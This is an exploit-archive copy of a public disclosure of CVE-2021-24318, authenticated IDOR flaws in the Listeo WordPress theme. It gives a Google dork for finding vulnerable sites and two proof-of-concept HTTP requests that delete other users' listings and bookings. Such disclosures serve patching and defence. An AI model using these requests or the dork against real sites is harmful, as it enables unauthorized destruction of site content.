Listeo WordPress Theme < = 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
CVE
Category
Price
Severity
CVE-2021-24318
CWE-639
$5,000
Critical
Author
Risk
Exploitation Type
Date
m0rph1t3
High
Authenticated Remote
2021-05-17
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050097 Below is a copy:
Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities /*!
- # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
- # GOOGLE DORK: inurl:/wp-content/themes/listeo/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 1.6.10
- # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259
- # CVSS: Multiple
- # CWE: CWE-639
- # CVE: CVE-2021-24318
*/
### -- [ Info: ]
[i] Multiple Authenticated IDOR vulnerabilities was discovered in the Listeo theme through v1.6.10 for WordPress.
[i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ].
### -- [ Vulnerabilities: ]
[x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=.
[x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted.
### -- [ Impact: ]
[~] Possibility to remove any content from the targeted website, up to the complete erasure of all content entirely.
### -- [ CVSS 3.1: ]
[%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U
[%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U
### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]
[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100
[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]
### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]
[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]
action=listeo_bookings_manage&booking_id=13&status=deleted
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum